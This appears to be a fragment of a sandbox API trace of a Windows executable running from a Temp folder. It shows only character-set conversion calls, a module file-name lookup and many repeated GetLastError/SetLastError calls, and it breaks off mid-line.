!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9e\xad\xe6\xfc\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0174.384] GetLastError () returned 0x6 [0174.384] SetLastError (dwErrCode=0x6) [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ") returned 256 [0174.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0174.384] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꁚ﷎ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0174.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\x9e\xad\xe6\xfc\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0174.384] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\wspgagwn.exe")) returned 0x30 [0174.384] GetLastError () returned 0x0 [0174.384] SetLastError (dwErrCode=0x0) [0174.384] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.385] GetLastError () returned 0x0 [0174.385] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError 
(dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.386] SetLastError (dwErrCode=0x0) [0174.386] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.387] GetLastError () returned 0x0 [0174.387] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError 
(dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.388] SetLastError (dwErrCode=0x0) [0174.388] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.389] GetLastError () returned 0x0 [0174.389] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError 
(dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.390] SetLastError (dwErrCode=0x0) [0174.390] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError 
(dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.391] GetLastError () returned 0x0 [0174.391] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.392] SetLastError (dwErrCode=0x0) [0174.392] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError 
(dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.393] SetLastError (dwErrCode=0x0) [0174.393] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.394] SetLastError (dwErrCode=0x0) [0174.394] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError 
(dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.395] SetLastError (dwErrCode=0x0) [0174.395] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] 